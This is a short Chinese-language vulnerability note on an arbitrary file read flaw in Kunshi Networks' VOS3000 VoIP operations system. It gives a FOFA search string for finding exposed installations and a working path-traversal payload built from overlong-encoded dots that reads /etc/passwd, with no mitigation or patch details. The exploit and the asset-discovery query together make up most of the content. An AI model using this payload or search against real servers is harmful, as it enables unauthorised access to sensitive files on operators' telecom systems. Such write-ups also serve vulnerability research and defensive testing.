# 昆石网络VOS3000任意文件读取漏洞

# 一、漏洞简介
昆石网络VOS3000是一款功能全面、性能稳定的VoIP运营支撑系统，适用于各类 电信级 运营业务，尤其适合中小规模VoIP运营业务的需求。无论是在云服务器还是物理机上，它都能完美运行，为运营商提供高效、稳定、可靠的电信级运营服务。昆石网络VOS3000任意文件读取，攻击者可通过此漏洞获取敏感信息。

# 二、影响版本
+ 昆石网络VOS3000

# 三、资产测绘
+ fofa`<font style="color:rgb(199, 37, 78);">body="VOS3000, VoIP, VoIP运营支撑系统, 软交换"</font>`
+ 特征

![1717167745472-1ad070b4-b932-41cf-ba11-bdad2f18a712.png](./img/NU8GNq2UNNv4VWQF/1717167745472-1ad070b4-b932-41cf-ba11-bdad2f18a712-105863.png)

# 四、漏洞复现
```rust
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
```

![1717167837710-837017ab-620b-46fe-aaec-fdf3664c4680.png](./img/NU8GNq2UNNv4VWQF/1717167837710-837017ab-620b-46fe-aaec-fdf3664c4680-357508.png)



> 更新: 2024-06-01 11:14:22  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qnkhfqg0258ep6b5>